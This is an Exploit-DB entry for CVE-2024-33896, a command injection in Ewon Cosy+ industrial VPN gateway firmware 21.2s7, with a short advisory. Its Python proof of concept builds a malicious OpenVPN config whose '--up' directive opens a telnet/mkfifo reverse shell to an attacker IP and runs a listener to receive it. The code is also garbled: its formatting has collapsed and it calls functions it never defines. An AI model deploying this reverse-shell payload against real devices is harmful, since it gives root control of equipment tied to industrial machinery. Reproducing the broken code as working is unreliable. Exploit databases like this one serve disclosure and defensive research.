Cosy+ firmware 21.2s7 - Command Injection

EDB-ID:

52160

CVE:

2024-33896

EDB Verified:

Author:

CodeB0ss

Type:

hardware

Exploit:   /  

Platform:

Multiple

Date:

2025-04-10

Vulnerable App: 
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
 # Tested on: Windows 11 Home Edition
 # CVE: CVE-2024-33896


import socket
import subprocess
import time

def configcreator(file_path):
 with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")


GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC

Hey,

Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.

Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services